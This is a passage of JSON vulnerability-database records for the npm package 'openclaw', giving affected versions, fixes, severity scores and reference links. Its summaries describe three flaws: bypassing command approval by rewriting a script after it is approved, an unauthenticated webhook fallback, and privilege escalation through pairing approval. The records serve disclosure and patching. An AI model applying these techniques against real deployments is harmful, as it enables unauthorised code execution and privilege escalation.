ties/VCID-849r-t5j1-vue8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91386?format=json","vulnerability_id":"VCID-84fd-3yvx-rfgq","summary":"OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals did not bind a mutable file operand for some script runners, including forms such as `tsx` and `jiti`. An attacker could obtain approval for a benign script-runner command, rewrite the referenced script on disk, and have the modified code execute under the already approved run context.\n\n## Impact\nDeployments that rely on node-host `system.run` approvals for script integrity could execute rewritten local code after operator approval. This can lead to unintended local code execution as the OpenClaw runtime user.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe approval planner only tracked mutable script operands for a hardcoded set of interpreters and runtime forms. Commands such as `tsx ./run.ts` and `jiti ./run.ts` fell through without a bound file snapshot, so the final pre-execution revalidation step was skipped.\n\n## Fix\nOpenClaw now fails closed for approval-backed interpreter and runtime commands unless it can bind exactly one concrete local file operand, and it extends direct-file binding coverage for additional runtime forms. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17277","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17313","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17316","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32978"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53","reference_id":"","reference_type":"","scores":[{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:30:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners","reference_id":"","reference_type":"","scores":[{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:30:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners"},{"reference_url":"https://github.com/advisories/GHSA-qc36-x95h-7j53","reference_id":"GHSA-qc36-x95h-7j53","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qc36-x95h-7j53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32978","GHSA-qc36-x95h-7j53"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-84fd-3yvx-rfgq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90936?format=json","vulnerability_id":"VCID-84v2-s1yq-rkfr","summary":"Duplicate Advisory: OpenClaw: BlueBubbles beta plugin webhook auth hardening (remove passwordless fallback)\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-5mx2-2mgw-x8rm. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 BlueBubbles webhook handler contains a passwordless fallback authentication path that allows unauthenticated webhook events in certain reverse-proxy or local routing configurations. Attackers can bypass webhook authentication by exploiting the loopback/proxy heuristics to send unauthenticated webhook events to the BlueBubbles plugin.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/283029bdea23164ab7482b320cb420d1b90df806","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/283029bdea23164ab7482b320cb420d1b90df806"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6b2f2811dc623e5faaf2f76afaa9279637174590","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6b2f2811dc623e5faaf2f76afaa9279637174590"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-webhook-access-via-passwordless-fallback-in-bluebubbles-plugin","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-webhook-access-via-passwordless-fallback-in-bluebubbles-plugin"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32896","reference_id":"CVE-2026-32896","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32896"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5mx2-2mgw-x8rm","reference_id":"GHSA-5mx2-2mgw-x8rm","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5mx2-2mgw-x8rm"},{"reference_url":"https://github.com/advisories/GHSA-vh4c-j2xv-9pv9","reference_id":"GHSA-vh4c-j2xv-9pv9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vh4c-j2xv-9pv9"}],"fixed_packages":[],"aliases":["GHSA-vh4c-j2xv-9pv9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-84v2-s1yq-rkfr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89605?format=json","vulnerability_id":"VCID-8aek-6dw1-tudj","summary":"Duplicate Advisory: OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hf68-49fm-59cq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I